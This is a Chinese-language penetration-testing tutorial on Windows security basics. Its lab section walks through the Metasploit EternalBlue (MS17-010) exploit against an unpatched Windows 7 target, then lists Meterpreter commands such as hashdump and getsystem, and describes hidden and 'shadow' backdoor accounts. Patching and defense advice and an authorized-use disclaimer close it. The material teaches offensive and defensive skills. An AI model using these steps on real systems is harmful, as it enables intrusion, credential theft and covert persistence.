一、为什么要学习 Windows 系统基础?

对于安全从业者而言,Windows 系统是绕不开的核心目标:

  • 覆盖范围广:个人设备、企业服务器、政务系统等场景均大量使用 Windows,攻击面广泛。
  • 价值密度高:服务器版本(如 Windows Server 2008/2012/2016)往往承载核心业务,是高价值攻击目标。
  • 攻防场景丰富:从本地提权到远程代码执行,从账户后门到漏洞利用,Windows 生态涵盖了渗透测试的全流程技术。

掌握 Windows 系统基础,是理解漏洞原理、开展渗透测试、构建防御体系的前提。

操作系统核心概念

操作系统是连接硬件与应用程序的中间层,核心作用是管理资源、提供接口、保障安全。在 Windows 中,我们重点关注:

  • 进程与线程:程序运行的基本单位,是恶意代码执行的载体。
  • 服务与端口:后台运行的程序(如 RDP、SMB)对外暴露端口,是远程攻击的入口。
  • 权限与账户:决定了用户 / 程序能执行哪些操作,是权限维持与提权的核心。

主流操作系统分类

按用途可分为:

  • 个人设备:Windows 10/11、macOS、Linux 桌面版,侧重交互体验与日常使用。
  • 服务器系统:Windows Server、CentOS、Ubuntu Server,侧重稳定性与性能,是渗透测试中的高价值目标。

Windows 核心服务认知:RDP 远程桌面

RDP(Remote Desktop Protocol)是 Windows 自带的远程管理服务,默认端口 3389,是渗透测试中高频利用的入口:

  • 连接前提:目标主机开启 RDP 服务、防火墙放行 3389 端口、攻击者拥有合法账户(或通过漏洞获取权限后开启 RDP)。
  • 攻击场景:暴力破解密码、利用弱口令 / 凭据泄露获取远程权限、通过漏洞提权后开启 RDP 作为后门。

二、Windows 系统服务安全: MS17-010 永恒之蓝

(一)漏洞背景:永恒之蓝的威胁

MS17-010 是微软 2017 年修复的SMB 协议远程代码执行漏洞,因勒索病毒 “WannaCry” 利用该漏洞全球传播而闻名。

  • 漏洞原理:攻击者通过构造恶意 SMBv1 数据包,可在未打补丁的 Windows 主机上远程执行任意代码,无需用户交互。
  • 影响版本:Windows 7/Server 2008 等未安装 KB4013381 补丁的系统。

(二)SMB 协议基础

SMB(Server Message Block)是 Windows 用于文件共享、打印机共享的核心协议,默认端口 445。

  • 版本差异:SMBv1 存在大量安全缺陷,SMBv2/3 已修复多数问题,但老旧系统仍广泛使用 SMBv1。
  • 攻击面:SMB 服务默认开启于 Windows 服务器,一旦暴露公网,极易成为永恒之蓝等漏洞的攻击目标。

(三)漏洞利用实验:Kali + Win7 实战

1. 实验环境
  • 攻击机:Kali Linux(预装 Metasploit 框架)
  • 靶机:Windows 7 SP1(未安装 MS17-010 补丁,开启 445 端口)
  • 网络:攻击机与靶机处于同一网段,确保连通性。
2. 利用步骤
  1. 启动 Metasploit 控制台:

    bash

    运行

    msfconsole
    
  2. 加载永恒之蓝漏洞模块:

    bash

    运行

    use exploit/windows/smb/ms17_010_eternalblue
    
  3. 配置靶机 IP:

    bash

    运行

    set RHOSTS 192.168.1.100  # 替换为 Win7 靶机 IP
    set LHOST 192.168.1.101   # 替换为 Kali 本机 IP
    
  4. 执行攻击:

    bash

    运行

    run
    
    若漏洞存在,将自动获取 Meterpreter 会话,获得靶机控制权。
3. Meterpreter 核心操作(常用命令)

获取会话后,可执行以下关键操作:

  • sysinfo:查看靶机系统信息
  • getuid:查看当前用户权限
  • hashdump:导出本地账户密码哈希(用于破解或横向移动)
  • upload/download:上传 / 下载文件(如植入后门)
  • execute:执行系统命令或程序
  • getsystem:尝试提权至 SYSTEM 权限

(四)关联知识:Windows 用户与组管理

1. 账户类型与权限等级

Windows 账户分为:

  • 管理员账户:拥有系统最高权限,可修改配置、安装软件、管理其他用户。
  • 标准用户:仅能修改个人文件,无法更改系统设置。
  • SYSTEM 账户:系统内置最高权限账户,是渗透提权的终极目标。
2. 文件 / 文件夹权限(NTFS 系统)

NTFS 权限决定了用户对文件 / 文件夹的访问能力,核心类型包括:

  • 读取(Read):查看文件内容与属性
  • 写入(Write):修改文件内容、创建新文件
  • 完全控制(Full Control):读取、写入、删除、修改权限等所有操作

配置方法

  • 图形界面:右键文件 / 文件夹 →「属性」→「安全」→ 编辑权限
  • 命令行:使用 icacls 命令批量修改权限
3. 核心管理命令(CMD 命令行)
  • net user:查看 / 创建 / 删除用户账户
  • net localgroup:管理本地用户组
  • net share:查看 / 创建共享文件夹
  • sc:管理系统服务(如启动 / 停止 RDP 服务)
4. 安全后门:隐藏用户与影子用户

在渗透测试中,攻击者常通过创建隐藏用户维持权限:

  • 简单隐藏用户:在用户名后添加 $ 符号(如 hack$),通过 net user 命令无法直接查看,但易被工具排查。
  • 影子用户:通过修改注册表,将普通用户关联至管理员账户,实现 “隐藏权限”,排查难度更高,是高级后门技术。

(五)漏洞防御策略

  1. 安装补丁:及时安装微软发布的 KB4013381 补丁,从根源修复漏洞。
  2. 禁用 SMBv1 协议:通过组策略或注册表关闭 SMBv1,使用更安全的 SMBv2/3。
  3. 端口防护:防火墙封禁 445 端口,避免 SMB 服务暴露公网。
  4. 流量监测:部署 IDS/IPS 设备,检测异常 SMB 数据包,及时发现攻击行为。


三、总结与进阶建议

Windows 系统安全是渗透测试的核心基础,从系统认知到漏洞利用,再到权限维持与防御,形成了完整的知识闭环:

  • 入门阶段:重点掌握 Windows 核心服务、账户权限、基础命令,理解漏洞原理。
  • 实战阶段:通过永恒之蓝等经典漏洞实验,熟悉渗透流程,掌握 Meterpreter 等工具操作。
  • 进阶阶段:学习域渗透、高级后门技术、防御对抗策略,向红队 / 蓝队方向发展。

重要提醒:本文仅用于合法授权的渗透测试与安全研究,严禁对未授权系统发起攻击,否则将承担相应法律责任。

Logo

腾讯云面向开发者汇聚海量精品云计算使用和开发经验,营造开放的云计算技术生态圈。

更多推荐